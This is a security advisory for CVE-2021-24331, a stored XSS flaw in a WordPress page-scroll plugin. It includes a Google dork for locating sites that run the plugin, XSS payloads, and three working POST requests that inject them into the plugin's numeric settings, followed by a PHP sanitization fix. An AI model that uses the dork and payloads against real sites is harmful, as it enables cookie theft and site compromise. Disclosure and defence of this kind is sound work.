/*!
- # VULNERABILITY: Smooth Scroll Page Up/Down Buttons WordPress Plugin <= 1.3 - Authenticated Persistent XSS
- # GOOGLE DORK: inurl:/wp-content/plugins/smooth-page-scroll-updown-buttons/
- # DATE: 2021-04-24
- # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
- # VENDOR: Mark Senff [ http://www.senff.com ]
- # SOFTWARE VERSION: <= 1.3
- # SOFTWARE LINK: https://wordpress.org/plugins/smooth-page-scroll-updown-buttons/
- # CVSS: AV:N/AC:L/PR:H/UI:N/S:C
- # CWE: CWE-79
- # CVE: CVE-2021-24331
*/

### -- [ Info: ]

[i] An Authenticated Persistent XSS vulnerability was discovered in the Smooth Scroll Page Up/Down Buttons plugin through v1.3 for WordPress.

[i] Vulnerable parameter(s):
    $page_scroll_buttons_options['psb_distance'] (smooth-page-scroll-updown-buttons/smooth-page-scroll-updown-buttons.php:222),
    $page_scroll_buttons_options['psb_buttonsize'] (smooth-page-scroll-updown-buttons/smooth-page-scroll-updown-buttons.php:229),
    $page_scroll_buttons_options['psb_speed'] (smooth-page-scroll-updown-buttons/smooth-page-scroll-updown-buttons.php:237).

### -- [ Impact: ]

[~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.

### -- [ Payloads: ]

[$] " autofocus=autofocus onfocus=alert(document.cookie); "
[$] " autofocus=autofocus onfocus=alert(document.domain); "

### -- [ PoC #1 | Authenticated Persistent XSS | Scrolling distance: ]

[!]
POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 289

action=save_page_scroll_buttons_options&_wpnonce=c7621ff4de&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpagescrollupdownmenu&psb_topbutton=on&psb_positioning=0&psb_distance=%22+autofocus%3Dautofocus+onfocus%3Dalert%28document.cookie%29%3B+%22&psb_buttonsize=13&psb_speed=13

### -- [ PoC #2 | Authenticated Persistent XSS | Button size: ]

[!]
POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 289

action=save_page_scroll_buttons_options&_wpnonce=c7621ff4de&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpagescrollupdownmenu&psb_topbutton=on&psb_positioning=0&psb_distance=13&psb_buttonsize=%22+autofocus%3Dautofocus+onfocus%3Dalert%28document.cookie%29%3B+%22&psb_speed=13

### -- [ PoC #3 | Authenticated Persistent XSS | Scrolling speed: ]

[!]
POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 289

action=save_page_scroll_buttons_options&_wpnonce=c7621ff4de&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpagescrollupdownmenu&psb_topbutton=on&psb_positioning=0&psb_distance=13&psb_buttonsize=13&psb_speed=%22+autofocus%3Dautofocus+onfocus%3Dalert%28document.domain%29%3B+%22

### -- [ Contacts: ]

[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze
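As an added defensive illustration for the three fields named in the Info section (this is not the plugin's code, and the plugin's real option handling is not reproduced): every vulnerable parameter is numeric, so a sanitize callback that coerces the values with absint() on save, paired with esc_attr() at the HTML attribute sink, leaves nothing of the injected string to render. The sps_* function names, the settings group name and the default values are assumptions.

```php
<?php
// Added example, not the plugin's code. Field/option names come from the advisory;
// the sps_* names, the settings group and the defaults below are assumed.

// Minimal fallbacks so this runs outside WordPress; inside WordPress the core
// absint() and esc_attr() are used instead.
if (!function_exists('absint')) {
    function absint($v) { return abs((int) $v); }
}
if (!function_exists('esc_attr')) {
    function esc_attr($v) { return htmlspecialchars((string) $v, ENT_QUOTES, 'UTF-8'); }
}

// Sanitize callback for the page_scroll_buttons_options option: each numeric field
// is coerced to a non-negative integer; anything that is not a positive number
// (including an injected attribute string) falls back to the assumed default.
function sps_sanitize_options(array $input): array {
    $defaults = ['psb_distance' => 100, 'psb_buttonsize' => 40, 'psb_speed' => 500];
    $clean = [];
    foreach ($defaults as $key => $default) {
        $value = isset($input[$key]) ? absint($input[$key]) : 0;
        $clean[$key] = $value > 0 ? $value : $default;
    }
    $clean['psb_topbutton'] = !empty($input['psb_topbutton']); // checkbox -> bool
    return $clean;
}

// Output side: the stored value is escaped again at the attribute sink, so the
// settings page stays safe even if an older, unsanitized value is still stored.
function sps_render_field(string $name, array $options): string {
    return sprintf('<input type="text" name="%s" value="%s">',
        esc_attr($name), esc_attr((string) $options[$name]));
}

// Constructed input: the decoded form body of the advisory's PoC #1.
$posted = [
    'psb_topbutton'  => 'on',
    'psb_distance'   => '" autofocus=autofocus onfocus=alert(document.cookie); "',
    'psb_buttonsize' => '13',
    'psb_speed'      => '13',
];
$options = sps_sanitize_options($posted);
var_dump($options['psb_distance']);            // the injected string is replaced by the default
echo sps_render_field('psb_distance', $options), PHP_EOL;

// Where this belongs in a plugin (assumed settings group name):
// register_setting('page_scroll_buttons', 'page_scroll_buttons_options',
//     ['sanitize_callback' => 'sps_sanitize_options']);
```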